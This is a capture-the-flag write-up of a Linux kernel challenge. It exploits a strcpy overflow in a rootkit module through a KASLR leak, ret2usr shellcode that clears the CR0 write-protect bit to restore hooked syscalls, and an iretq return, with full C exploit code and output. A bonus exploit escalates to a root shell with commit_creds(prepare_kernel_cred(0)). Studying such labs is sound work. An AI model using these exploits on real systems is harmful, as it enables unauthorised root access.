TL;DR

Same rootkit, harder exploitation. SMEP/SMAP are disabled, so the kernel can execute userspace code (ret2usr). Overflow the buffer → execute our shellcode → clear the CR0 write-protect bit → restore the syscall table → iretq back to userspace. As a bonus, the same primitive also gets us a root shell.

Tags: pwn kernel rootkit ret2usr privilege-escalation CR0 iretq SMEP-bypass

Challenge Files: Kernel module (rootkit), same as before


Note: This writeup assumes you’ve read the previous “Hello Rootkitty” challenge. I’ll focus on the advanced techniques specific to the “Harder” version without repeating the basics.


What’s Different?

The vulnerability is the same (buffer overflow in strcpy), but now we have:

New constraints:

  • KASLR is enabled (addresses randomized)
  • Write Protection (WP bit in CR0) is active
  • Need to return cleanly to userspace

But also new opportunities:

  • SMEP/SMAP are disabled - we can execute userspace code from kernel!
  • We have /proc/kallsyms access for KASLR bypass

This opens up ret2usr attacks - one of the classic kernel exploitation techniques.

Understanding the Syscall Table

Before diving into exploitation, let’s understand what we’re attacking.

How Syscalls Work

A syscall is how userspace programs ask the kernel to do privileged operations:

┌─────────────────────────────────────────┐
│         USERSPACE (Ring 3)              │
│                                         │
│  Program: read(fd, buffer, size)       │
│              │                          │
│              ▼                          │
│         syscall(0, ...)                 │
└──────────────│──────────────────────────┘
               │
               │ Transition Ring 3 → Ring 0
               ▼
┌─────────────────────────────────────────┐
│         KERNEL SPACE (Ring 0)           │
│                                         │
│  Syscall Table:                         │
│  ┌────────────────────────┐             │
│  │ [0]  → sys_read        │             │
│  │ [1]  → sys_write       │             │
│  │ [2]  → sys_open        │             │
│  │ [3]  → sys_close       │             │
│  │ ...                    │             │
│  │ [6]  → sys_lstat       │ (0x06)      │
│  │ [78] → sys_getdents    │ (0x4e)      │
│  │ ...                    │             │
│  │ [217]→ sys_getdents64  │ (0xd9)      │
│  └────────────────────────┘             │
└─────────────────────────────────────────┘

The syscall table is just an array of function pointers:

// Simplified Linux kernel code
void *sys_call_table[] = {
    [0]   = sys_read,
    [1]   = sys_write,
    [6]   = sys_lstat,      // 0x06
    [78]  = sys_getdents,   // 0x4e (0x270 bytes offset)
    [217] = sys_getdents64, // 0xd9 (0x6c8 bytes offset)
};
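The byte offsets in the comments above follow from the slot size: every entry is an 8-byte pointer on x86-64, so syscall n sits at n * 8 from the start of the table. A minimal sketch of that arithmetic (the helper name is made up for illustration):

```c
#include <stddef.h>

/* Byte offset of syscall number `nr` inside the table,
   assuming 8-byte function pointers (x86-64).
   Hypothetical helper, not part of the exploit. */
static size_t syscall_slot_offset(unsigned int nr) {
    return (size_t)nr * 8;
}
```

Calling it with 6, 78 and 217 gives the 0x30, 0x270 and 0x6c8 offsets used throughout this writeup.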

Rootkit Syscall Hooking

The rootkit modifies these pointers to intercept calls:

// Normal state
sys_call_table[217] = sys_getdents64;

// After infection
sys_call_table[217] = malicious_getdents64;

// Now when you run ls:
// ls → getdents64() → malicious_getdents64()
//    → filters results
//    → hides files
//    → calls real sys_getdents64
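The hook/unhook mechanics can be tried out in plain userspace C with an ordinary array of function pointers. This is only a model of the idea: the handlers, the table and the helper names below are stand-ins, not the rootkit's code.

```c
#include <stddef.h>

typedef long (*handler_t)(long);

/* Stand-ins for a genuine handler and a rootkit replacement. */
static long real_handler(long x)   { return x; }
static long hooked_handler(long x) { return real_handler(x) - 1; /* "filters" the result */ }

static handler_t table[4] = { real_handler, real_handler, real_handler, real_handler };
static handler_t saved_entry;

/* Install the hook, remembering the original pointer. */
static void install_hook(size_t nr) {
    saved_entry = table[nr];
    table[nr] = hooked_handler;
}

/* Undo the hook by writing the original pointer back. */
static void remove_hook(size_t nr) {
    table[nr] = saved_entry;
}

/* Dispatch through the table, like the syscall entry path does. */
static long dispatch(size_t nr, long arg) {
    return table[nr](arg);
}
```

Restoring the table in the exploit is the same `remove_hook` idea, except that we have to supply the original pointers ourselves because we cannot read the rootkit's saved copies.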

Write Protection (CR0 Register)

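The syscall table lives in read-only memory. While the WP (Write Protect) bit in CR0 is set, even ring 0 code faults when it writes to a read-only page, so the bit has to be cleared first:

// Pseudocode, Intel syntax: disable WP (bit 16 of CR0)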
mov rax, cr0
and rax, ~0x10000    // Clear bit 16
mov cr0, rax

// Now we can modify the table
sys_call_table[217] = evil_function;

// Re-enable WP
mov rax, cr0
or rax, 0x10000      // Set bit 16
mov cr0, rax

This is exactly what rootkits do - and what we’ll need to do to restore the table.
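The mask arithmetic can be checked in userspace without touching the real register. The sketch below only manipulates a plain integer; the sample value 0x80050033 is an assumption, taken as a CR0 value commonly seen on x86-64 Linux.

```c
#include <stdint.h>

#define CR0_WP (UINT64_C(1) << 16)  /* Write Protect is bit 16 */

/* Value to load into CR0 to allow writes to read-only pages. */
static uint64_t cr0_without_wp(uint64_t cr0) { return cr0 & ~CR0_WP; }

/* Value to load into CR0 to restore write protection. */
static uint64_t cr0_with_wp(uint64_t cr0) { return cr0 | CR0_WP; }

/* Non-zero when the WP bit is set in the given value. */
static int cr0_wp_enabled(uint64_t cr0) { return (cr0 & CR0_WP) != 0; }
```

Only bit 16 changes between the two states, which is why the shellcode can re-enable protection with a single `or` afterwards.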

The Challenge

Same three hooked syscalls as before:

Syscall      Number   Hex    Table Offset   Purpose
lstat        6        0x06   0x30           File metadata
getdents     78       0x4e   0x270          List directory (32-bit)
getdents64   217      0xd9   0x6c8          List directory (64-bit)

The vulnerability is still the strcpy buffer overflow - offset is still 102 bytes to RIP.

Active Protections

Protection   Status     Bypass Method
KASLR        Enabled    Read /proc/kallsyms
WP (CR0)     Enabled    Disable in shellcode
SMEP         Disabled   Ret2usr possible!
SMAP         Disabled   User memory accessible from kernel

The lack of SMEP/SMAP is the game changer here.

What is SMEP/SMAP?

SMEP (Supervisor Mode Execution Prevention):

  • Prevents kernel from executing code in userspace memory
  • Without it: we can put our shellcode in userspace and jump to it from kernel

SMAP (Supervisor Mode Access Prevention):

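  • Prevents kernel from reading or writing userspace memory, except inside explicit stac/clac windows (as used by copy_from_user/copy_to_user)
  • Without it: kernel-mode code can read/write our userspace variables directly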

Impact: With both disabled, we can execute userspace code with kernel privileges (ret2usr).
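A quick way to get a hint about SMEP/SMAP from inside the guest is the `flags` line of /proc/cpuinfo, where CPU features are listed as space-separated words. The matcher below is a small sketch (the function name is made up) that checks for a whole-word flag in such a line. Treat the result as a hint only: the authoritative state is bits 20 (SMEP) and 21 (SMAP) of CR4, which userspace cannot read.

```c
#include <string.h>

/* Return 1 if `flag` appears as a whole whitespace-separated word in `flags`. */
static int has_cpu_flag(const char *flags, const char *flag) {
    size_t len = strlen(flag);
    const char *p = flags;

    if (len == 0) return 0;
    while ((p = strstr(p, flag)) != NULL) {
        int starts = (p == flags) || p[-1] == ' ' || p[-1] == '\t';
        int ends   = p[len] == '\0' || p[len] == ' ' || p[len] == '\n';
        if (starts && ends) return 1;
        p += len;  /* skip this partial match and keep searching */
    }
    return 0;
}
```

In practice you would read the `flags` line with fgets and pass it in together with "smep" or "smap".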

Exploitation Strategy

Our approach will be different from the basic version:

  1. Bypass KASLR - Parse /proc/kallsyms for kernel base address
  2. Write userspace shellcode - Function that restores the syscall table
  3. Overflow buffer - Same technique, offset 102
  4. Ret2usr - Redirect RIP to the userspace shellcode, which fixes the table
  5. iretq back - Proper transition from kernel to userspace

Why This is Harder

Unlike the first version where we just called cleanup_module(), now we need to:

  • Manually manipulate CR0 to disable write protection
  • Write directly to the syscall table
  • Use iretq instruction to return to userspace properly
  • Save and restore CPU context (CS, SS, RSP, RFLAGS)

Step 1: KASLR Bypass

With KASLR, kernel addresses are randomized on each boot, so we need to read them at runtime:

unsigned long resolve_kernel_symbol(const char *symbol_name) {
    FILE *kallsyms = fopen("/proc/kallsyms", "r");
    if (!kallsyms) return 0;
    
    char buffer[512], current_symbol[256];
    unsigned long symbol_addr = 0;
    
    // Format: <address> <type> <symbol>
    // Example: ffffffffa2800000 T _text
    while (fgets(buffer, sizeof(buffer), kallsyms)) {
        if (sscanf(buffer, "%lx %*c %255s", &symbol_addr, current_symbol) == 2) {
            if (strcmp(current_symbol, symbol_name) == 0) {
                fclose(kallsyms);
                return symbol_addr;
            }
        }
    }
    
    fclose(kallsyms);
    return 0;
}

// Usage
unsigned long kbase = resolve_kernel_symbol("_text");
unsigned long syscall_table = kbase + 0x8001a0;
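Once `_text` is known, every other address is just base plus a fixed offset. The sketch below shows that rebasing, plus two sanity checks that are worth doing before trusting the value. The helper names are made up, and 0xffffffff81000000 is assumed to be the non-randomized text base (the default for x86-64 kernels).

```c
#include <stdint.h>

/* Assumed default (non-randomized) x86-64 kernel text base. */
#define DEFAULT_TEXT_BASE UINT64_C(0xffffffff81000000)

/* How far KASLR moved the kernel for this boot. */
static uint64_t kaslr_slide(uint64_t text_addr) {
    return text_addr - DEFAULT_TEXT_BASE;
}

/* Turn a static offset from the kernel image into a runtime address. */
static uint64_t rebase(uint64_t kbase, uint64_t offset) {
    return kbase + offset;
}

/* /proc/kallsyms prints all-zero addresses when pointers are hidden
   from the reader, so a zero base means the leak is not usable. */
static int kallsyms_usable(uint64_t text_addr) {
    return text_addr != 0;
}
```

With the base from the run shown later (0xffffffffae800000), `rebase(kbase, 0x8001a0)` yields the 0xffffffffaf0001a0 syscall table address printed by the exploit.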

Step 2: Save Userspace Context

Before triggering the exploit, we need to save our userspace CPU state for later return:

unsigned long saved_cs, saved_ss, saved_rflags, saved_rsp;

void capture_userspace_context() {
    asm volatile(
        "mov %%cs, %0;"      // Code Segment
        "mov %%ss, %1;"      // Stack Segment  
        "mov %%rsp, %2;"     // Stack Pointer
        "pushfq;"            // Push RFLAGS
        "pop %3;"            // Pop into variable
        : "=r"(saved_cs), "=r"(saved_ss), 
          "=r"(saved_rsp), "=r"(saved_rflags)
    );
}

Why? The iretq instruction needs these values to properly return from kernel to userspace.

Step 3: The Restore Shellcode

This is where the magic happens. Our shellcode runs in kernel context:

void cleanup_and_exit(void);  // forward declaration, defined below

void restore_syscall_table() {
    unsigned long *sys_table = (unsigned long *)(kbase + 0x8001a0);
    
    // 1. Disable Write Protection (clear bit 16 of CR0)
    asm volatile(
        "mov %%cr0, %%rax;"
        "and $~0x10000, %%rax;"  // Clear WP bit
        "mov %%rax, %%cr0;"
        ::: "rax"
    );
    
    // 2. Restore original syscalls
    sys_table[217] = kbase + 0xc7610;  // sys_getdents64
    sys_table[78]  = kbase + 0xc7710;  // sys_getdents
    sys_table[6]   = kbase + 0xbad30;  // sys_lstat
    
    // 3. Re-enable Write Protection (set bit 16)
    asm volatile(
        "mov %%cr0, %%rax;"
        "or $0x10000, %%rax;"    // Set WP bit
        "mov %%rax, %%cr0;"
        ::: "rax"
    );
    
    // 4. Return to userspace via iretq
    // iretq pops in order: RIP, CS, RFLAGS, RSP, SS
    asm volatile(
        "swapgs;"                          // Swap GS (kernel ↔ user)
        "mov %0, %%r14; push %%r14;"       // SS
        "mov %1, %%r14; push %%r14;"       // RSP
        "mov %2, %%r14; push %%r14;"       // RFLAGS
        "mov %3, %%r14; push %%r14;"       // CS
        "mov %4, %%r14; push %%r14;"       // RIP
        "iretq;"
        :
        : "m"(saved_ss), "m"(saved_rsp), "m"(saved_rflags),
          "m"(saved_cs), "r"(cleanup_and_exit)
        : "r14"
    );
}

void cleanup_and_exit() {
    // Back in userspace now!
    exit(EXIT_SUCCESS);
}

Understanding swapgs + iretq

swapgs:

  • Swaps the GS register base between kernel and user values
  • Necessary for proper context switching
  • Without it: GS corruption leads to kernel panic

iretq (Interrupt Return):

  • Instruction used to return from an interrupt/exception handler
  • Pops 5 values from stack: RIP, CS, RFLAGS, RSP, SS
  • Transitions from Ring 0 (kernel) to Ring 3 (userspace)
  • Without it: we’d stay in kernel mode and crash

Why not just ret?

  • ret only pops RIP - it never changes the privilege level or the stack
  • We’d keep running our userspace code in Ring 0, on the kernel stack, with the kernel GS base
  • The next syscall, interrupt, or context switch would then crash the kernel
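The five values iretq consumes can be pictured as a struct laid out from the lowest stack address upward. This is an illustrative sketch (the struct and helper are not part of the exploit); the selector values 0x33 and 0x2b in the usage note are the usual x86-64 Linux user-mode CS and SS, which is what the context-saving step normally captures.

```c
#include <stddef.h>
#include <stdint.h>

/* Layout iretq expects at RSP, lowest address first.
   The exploit pushes these fields in reverse order (SS first). */
struct iret_frame {
    uint64_t rip;     /* where userspace execution resumes */
    uint64_t cs;      /* user code segment selector */
    uint64_t rflags;  /* saved flags */
    uint64_t rsp;     /* user stack pointer */
    uint64_t ss;      /* user stack segment selector */
};

/* Hypothetical helper that fills a frame from saved context. */
static struct iret_frame make_iret_frame(uint64_t rip, uint64_t cs,
                                         uint64_t rflags, uint64_t rsp,
                                         uint64_t ss) {
    struct iret_frame f = { rip, cs, rflags, rsp, ss };
    return f;
}
```

For example, `make_iret_frame(target, 0x33, 0x246, user_stack, 0x2b)` describes a return to `target` in Ring 3; the whole frame is 40 bytes, which matches the five 8-byte pushes in the shellcode.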

Step 4: Build the Payload

int main() {
    char filename[256];
    char buffer[256];
    
    // 1. Bypass KASLR
    kbase = resolve_kernel_symbol("_text");
    printf("[+] Kernel base: 0x%lx\n", kbase);
    
    // 2. Save context for iretq
    capture_userspace_context();
    
    // 3. Build exploit filename (zero-fill so the name is NUL-terminated)
    memset(filename, 0, sizeof(filename));
    strcpy(filename, "ecsc_flag_");
    memset(filename + 10, 'B', 102);  // Padding to RIP
    
    // 4. ROP chain
    unsigned long *rop = (unsigned long *)(filename + 112);
    rop[0] = kbase + 0x02fd70;                    // ret (stack alignment)
    rop[1] = (unsigned long)restore_syscall_table; // our shellcode
    
    // 5. Create malicious file
    int fd = open(filename, O_RDWR | O_CREAT, 0644);
    close(fd);
    
    // 6. Trigger vulnerability
    fd = open(".", O_RDONLY | O_DIRECTORY);
    syscall(SYS_getdents, fd, buffer, 256);
    close(fd);
    
    return 0;
}
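The payload layout can also be built and inspected on its own, which helps when debugging a chain that silently gets truncated. The sketch below uses made-up helper names and copies the chain entries with memcpy instead of casting the buffer. Keep in mind that a filename cannot contain a NUL byte (or '/'), so both open() and the kernel's strcpy stop at the first zero byte: only the low non-zero bytes of the userspace address are actually written.

```c
#include <stdint.h>
#include <string.h>

#define PREFIX  "ecsc_flag_"
#define PAD_LEN 102

/* Write prefix + padding + two 8-byte chain entries into `out`.
   Returns the full layout length, or 0 if `out` is too small. */
static size_t build_payload(char *out, size_t out_len,
                            uint64_t ret_gadget, uint64_t shellcode) {
    size_t prefix_len = strlen(PREFIX);
    size_t total = prefix_len + PAD_LEN + 2 * sizeof(uint64_t);

    if (out_len < total + 1) return 0;
    memset(out, 0, out_len);                       /* guarantees termination */
    memcpy(out, PREFIX, prefix_len);
    memset(out + prefix_len, 'B', PAD_LEN);        /* padding up to saved RIP */
    memcpy(out + prefix_len + PAD_LEN, &ret_gadget, sizeof ret_gadget);
    memcpy(out + prefix_len + PAD_LEN + 8, &shellcode, sizeof shellcode);
    return total;
}

/* Number of bytes that survive as a filename (up to the first NUL). */
static size_t effective_length(const char *payload) {
    return strlen(payload);
}
```

Comparing `build_payload`'s return value with `effective_length` shows how many bytes of the chain are really delivered; a zero byte inside the kernel gadget address would cut the chain short before the shellcode pointer.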

Execution Flow

Here’s what happens when we trigger the exploit:

1. Create file: ecsc_flag_BBB...[ret][shellcode_addr]
                                     ↓
2. syscall(SYS_getdents) → kernel calls ecsc_sys_getdents()
                                     ↓
3. strcpy(buffer, filename) → OVERFLOW overwrites return address
                                     ↓
4. Function returns → ret gadget → RIP = restore_syscall_table
                                     ↓
5. Shellcode executes (in kernel context):
   mov rax, cr0; and rax, ~0x10000; mov cr0, rax  ← Disable WP
   sys_table[217] = sys_getdents64                 ← Restore entries
   sys_table[78]  = sys_getdents
   sys_table[6]   = sys_lstat  
   mov rax, cr0; or rax, 0x10000; mov cr0, rax    ← Enable WP
   swapgs                                          ← Prep GS for userspace
   push SS/RSP/RFLAGS/CS/RIP                       ← Setup stack for iretq
   iretq                                           ← Return to userspace
                                     ↓
6. cleanup_and_exit() executes → exit(0)
                                     ↓
7. Rootkit disabled! Files are visible

Full Exploit Code

// Compilation: gcc -o pwn pwn.c -static -no-pie -O0
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

// Kernel offsets (find via reverse engineering or trial)
#define SYSCALL_TABLE_OFFSET 0x8001a0
#define GETDENTS64_OFFSET    0xc7610
#define GETDENTS_OFFSET      0xc7710
#define LSTAT_OFFSET         0xbad30
#define RET_GADGET_OFFSET    0x02fd70
#define OVERFLOW_OFFSET      102

static unsigned long kbase = 0;
static unsigned long saved_cs, saved_ss, saved_rflags, saved_rsp;

unsigned long resolve_kernel_symbol(const char *symbol_name) {
    FILE *kallsyms = fopen("/proc/kallsyms", "r");
    if (!kallsyms) return 0;
    
    char buffer[512], current_symbol[256];
    unsigned long symbol_addr = 0;
    
    while (fgets(buffer, sizeof(buffer), kallsyms)) {
        if (sscanf(buffer, "%lx %*c %255s", &symbol_addr, current_symbol) == 2) {
            if (strcmp(current_symbol, symbol_name) == 0) {
                fclose(kallsyms);
                return symbol_addr;
            }
        }
    }
    
    fclose(kallsyms);
    return 0;
}

void capture_userspace_context() {
    asm volatile(
        "mov %%cs, %0;"
        "mov %%ss, %1;"
        "mov %%rsp, %2;"
        "pushfq;"
        "pop %3;"
        : "=r"(saved_cs), "=r"(saved_ss), 
          "=r"(saved_rsp), "=r"(saved_rflags)
    );
}

void cleanup_and_exit() {
    exit(EXIT_SUCCESS);
}

void restore_syscall_table() {
    unsigned long *sys_table = (unsigned long *)(kbase + SYSCALL_TABLE_OFFSET);
    
    // Disable Write Protection
    asm volatile(
        "mov %%cr0, %%rax;"
        "and $~0x10000, %%rax;"
        "mov %%rax, %%cr0;"
        ::: "rax"
    );
    
    // Restore hooked syscalls
    sys_table[217] = kbase + GETDENTS64_OFFSET;
    sys_table[78]  = kbase + GETDENTS_OFFSET;
    sys_table[6]   = kbase + LSTAT_OFFSET;
    
    // Re-enable Write Protection
    asm volatile(
        "mov %%cr0, %%rax;"
        "or $0x10000, %%rax;"
        "mov %%rax, %%cr0;"
        ::: "rax"
    );
    
    // Return to userspace
    asm volatile(
        "swapgs;"
        "mov %0, %%r14; push %%r14;"  // SS
        "mov %1, %%r14; push %%r14;"  // RSP
        "mov %2, %%r14; push %%r14;"  // RFLAGS
        "mov %3, %%r14; push %%r14;"  // CS
        "mov %4, %%r14; push %%r14;"  // RIP
        "iretq;"
        :
        : "m"(saved_ss), "m"(saved_rsp), "m"(saved_rflags),
          "m"(saved_cs), "r"(cleanup_and_exit)
        : "r14"
    );
}

int main() {
    char filename[256];
    char buffer[256];
    int fd;
    
    // Step 1: Bypass KASLR
    kbase = resolve_kernel_symbol("_text");
    if (!kbase) {
        fprintf(stderr, "[-] Failed to resolve kernel base\n");
        return EXIT_FAILURE;
    }
    
    printf("[+] Kernel base: 0x%lx\n", kbase);
    printf("[+] Syscall table: 0x%lx\n", kbase + SYSCALL_TABLE_OFFSET);
    
    // Step 2: Save userspace context
    capture_userspace_context();
    
    // Step 3: Build payload
    memset(filename, 0, sizeof(filename));
    strcpy(filename, "ecsc_flag_");
    
    int prefix_len = strlen(filename);
    memset(filename + prefix_len, 'B', OVERFLOW_OFFSET);
    
    // Step 4: ROP chain
    unsigned long *rop = (unsigned long *)(filename + prefix_len + OVERFLOW_OFFSET);
    rop[0] = kbase + RET_GADGET_OFFSET;
    rop[1] = (unsigned long)restore_syscall_table;
    
    printf("[+] Shellcode @ 0x%lx\n", (unsigned long)restore_syscall_table);
    printf("[+] Weaponizing filename...\n");
    
    // Step 5: Create malicious file
    fd = open(filename, O_RDWR | O_CREAT, 0644);
    if (fd < 0) {
        perror("[-] File creation failed");
        return EXIT_FAILURE;
    }
    close(fd);
    
    printf("[+] Triggering vulnerability...\n");
    
    // Step 6: Trigger overflow
    fd = open(".", O_RDONLY | O_DIRECTORY);
    if (fd < 0) {
        perror("[-] Directory open failed");
        return EXIT_FAILURE;
    }
    
    syscall(SYS_getdents, fd, buffer, sizeof(buffer));
    close(fd);
    
    fprintf(stderr, "[-] Exploit failed\n");
    return EXIT_FAILURE;
}

Execution

$ cd /mnt/share
$ gcc -o pwn pwn.c -static -no-pie -O0
$ ./pwn
[+] Kernel base: 0xffffffffae800000
[+] Syscall table: 0xffffffffaf0001a0
[+] Shellcode @ 0x4019d5
[+] Weaponizing filename...
[+] Triggering vulnerability...

$ cd /
$ cat ecsc_flag_*
ECSC{2e94068aa85e0a7a21163fcad4566a0f92fa08dcaf874a5e34fba4612cfd7eaa}

Success!

BONUS: Root Shell Exploitation

Why just restore the syscall table when we can get root?

Kernel Privilege Functions

Linux kernel provides two critical functions for privilege management:

// Allocates a new credential set; with a NULL argument it is copied from init_cred (root, full capabilities)
struct cred *prepare_kernel_cred(struct task_struct *daemon);

// Applies credentials to current process
int commit_creds(struct cred *new);

Magic combo: commit_creds(prepare_kernel_cred(0)) gives us UID/GID 0!
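Since the resolved addresses are ordinary function pointers from the CPU's point of view, the same call can be written in C through typedefs instead of inline assembly. The sketch below is one possible way to do it, not the code used in this writeup; the mock functions exist only so the call order can be exercised outside the kernel.

```c
#include <stddef.h>

/* Opaque stand-in for the kernel's struct cred. */
struct cred;

typedef struct cred *(*prepare_kernel_cred_t)(void *daemon);
typedef int (*commit_creds_t)(struct cred *new_cred);

/* commit_creds(prepare_kernel_cred(NULL)) through resolved addresses. */
static int escalate(prepare_kernel_cred_t pkc, commit_creds_t cc) {
    return cc(pkc(NULL));
}

/* Userspace mocks (hypothetical) standing in for the kernel functions. */
static int mock_cred_storage;
static int mock_committed;

static struct cred *mock_prepare(void *daemon) {
    return daemon == NULL ? (struct cred *)&mock_cred_storage : NULL;
}

static int mock_commit(struct cred *c) {
    mock_committed = (c == (struct cred *)&mock_cred_storage);
    return 0;
}
```

In a real ret2usr payload the two arguments would be the addresses read from /proc/kallsyms, cast to these pointer types, and the call would run in kernel context.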

Root Shellcode

void spawn_shell(void);  // forward declaration, defined below

void shellcode() {
    // commit_creds(prepare_kernel_cred(0))
    asm(
        ".intel_syntax noprefix;"
        "xor rdi, rdi;"              // rdi = 0 (NULL)
        "mov rax, %0;"               // rax = prepare_kernel_cred
        "call rax;"                  // prepare_kernel_cred(0)
        "mov rdi, rax;"              // rdi = result (new creds)
        "mov rax, %1;"               // rax = commit_creds
        "call rax;"                  // commit_creds(new_creds)
        ".att_syntax;"
        :
        : "r"(prepare_kernel_cred), "r"(commit_creds)
        : "rax", "rdi", "rdx", "rcx", "rsi", "r8", "r9", "r10", "r11"
    );
    
    // Return to userspace
    asm(
        ".intel_syntax noprefix;"
        "swapgs;"
        "mov r15, user_ss;"
        "push r15;"
        "mov r15, user_sp;"
        "push r15;"
        "mov r15, user_rflags;"
        "push r15;"
        "mov r15, user_cs;"
        "push r15;"
        "mov r15, %0;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
        :
        : "r"(spawn_shell)
        : "r15"
    );
}

void spawn_shell() {
    printf("[+] UID: %d\n", getuid());
    if (getuid() == 0) {
        printf("[+] ROOT SHELL!\n");
    }
    char *argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);
    exit(0);
}

Root Exploit (Full Code)

// gcc -o root root.c -static -no-pie -O0
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h> 
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

#define OFFSET 102
#define GADGET_RET_OFFSET 0x02fd70

unsigned long user_cs, user_ss, user_rflags, user_sp;
unsigned long prepare_kernel_cred;
unsigned long commit_creds;
unsigned long kernel_base;

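void save_state() {
    // The body uses Intel syntax, so switch the assembler mode explicitly
    // (the build command does not pass -masm=intel)
    asm(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
}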

void spawn_shell() {
    printf("[+] UID: %d\n", getuid());
    
    if (getuid() == 0) {
        printf("[+] ROOT SHELL OBTAINED!\n");
    }
    
    char *argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);
    exit(0);
}

void shellcode() {
    // commit_creds(prepare_kernel_cred(0))
    // AT&T syntax: the source operand comes first
    asm(
        "xor %%rdi, %%rdi;"      // rdi = NULL
        "mov %0, %%rax;"         // rax = prepare_kernel_cred
        "call *%%rax;"           // prepare_kernel_cred(NULL)
        "mov %%rax, %%rdi;"      // rdi = new creds
        "mov %1, %%rax;"         // rax = commit_creds
        "call *%%rax;"           // commit_creds(new creds)
        :
        : "r"(prepare_kernel_cred), "r"(commit_creds)
        : "rax", "rdi", "rdx", "rcx", "rsi", "r8", "r9", "r10", "r11"
    );
    
    // Return to userspace
    asm(
        "swapgs;"
        "mov %0, %%r15; push %%r15;"  // SS
        "mov %1, %%r15; push %%r15;"  // RSP
        "mov %2, %%r15; push %%r15;"  // RFLAGS
        "mov %3, %%r15; push %%r15;"  // CS
        "mov %4, %%r15; push %%r15;"  // RIP
        "iretq;"
        :
        : "m"(user_ss), "m"(user_sp), "m"(user_rflags), 
          "m"(user_cs), "r"(spawn_shell)
        : "r15"
    );
}

unsigned long get_symbol(const char *sym) {
    FILE *f = fopen("/proc/kallsyms", "r");
    if (!f) return 0;
    
    char line[256], name[128];
    unsigned long addr = 0;
    
    while (fgets(line, sizeof(line), f)) {
        if (sscanf(line, "%lx %*c %127s", &addr, name) == 2) {
            if (!strcmp(name, sym)) {
                fclose(f);
                return addr;
            }
        }
    }
    fclose(f);
    return 0;
}

int main() {
    char name[200];
    unsigned long *rop;
    
    // Resolve symbols
    kernel_base = get_symbol("_text");
    prepare_kernel_cred = get_symbol("prepare_kernel_cred");
    commit_creds = get_symbol("commit_creds");
    
    if (!kernel_base || !prepare_kernel_cred || !commit_creds) {
        printf("[-] Failed to resolve symbols\n");
        return 1;
    }
    
    printf("[+] kernel_base:          0x%lx\n", kernel_base);
    printf("[+] prepare_kernel_cred:  0x%lx\n", prepare_kernel_cred);
    printf("[+] commit_creds:         0x%lx\n", commit_creds);
    printf("[+] shellcode:            0x%lx\n", (unsigned long)shellcode);
    
    save_state();
    
    // Build payload
    memset(name, 0, sizeof(name));
    strcpy(name, "ecsc_flag_");
    memset(name + 10, 'A', OFFSET);
    
    rop = (unsigned long *)(name + 10 + OFFSET);
    rop[0] = kernel_base + GADGET_RET_OFFSET;
    rop[1] = (unsigned long)shellcode;
    
    printf("[+] Triggering privilege escalation...\n");
    
    // Trigger
    int fd = open(name, O_RDWR | O_CREAT, 0644);
    close(fd);
    
    fd = open(".", O_RDONLY);
    syscall(SYS_getdents, fd, name, 200);
    
    printf("[-] Still here\n");
    return 0;
}

Root Shell Demo

$ id
uid=1000(user) gid=1000(user)

$ ./root
[+] kernel_base:          0xffffffffa2800000
[+] prepare_kernel_cred:  0xffffffffa28ab540
[+] commit_creds:         0xffffffffa28ab1e0
[+] shellcode:            0x401b3f
[+] Triggering privilege escalation...
[+] UID: 0

# id
uid=0(root) gid=0(root)

Why Root Method Works

  1. prepare_kernel_cred(0) creates a cred structure with UID/GID 0 and a full capability set (a copy of init_cred)
  2. commit_creds(new_cred) applies these credentials to current process
  3. iretq to spawn_shell() - process inherits root credentials
  4. getuid() returns 0 - we’re root!

No need to touch CR0 or syscall table - we’re just calling legitimate kernel functions.

Protection mechanisms:

Protection   If Enabled                  If Disabled
SMEP         Blocks ret2usr              Userspace code executable from kernel
SMAP         Blocks user memory access   Kernel can read/write userspace
KASLR        Randomizes addresses        Fixed addresses
WP (CR0)     Syscall table read-only     Can be modified

Key insights:

  • ret2usr is powerful but requires SMEP to be disabled
  • iretq is necessary for clean kernel-to-user transitions

Flag

ECSC{2e94068aa85e0a7a21163fcad4566a0f92fa08dcaf874a5e34fba4612cfd7eaa}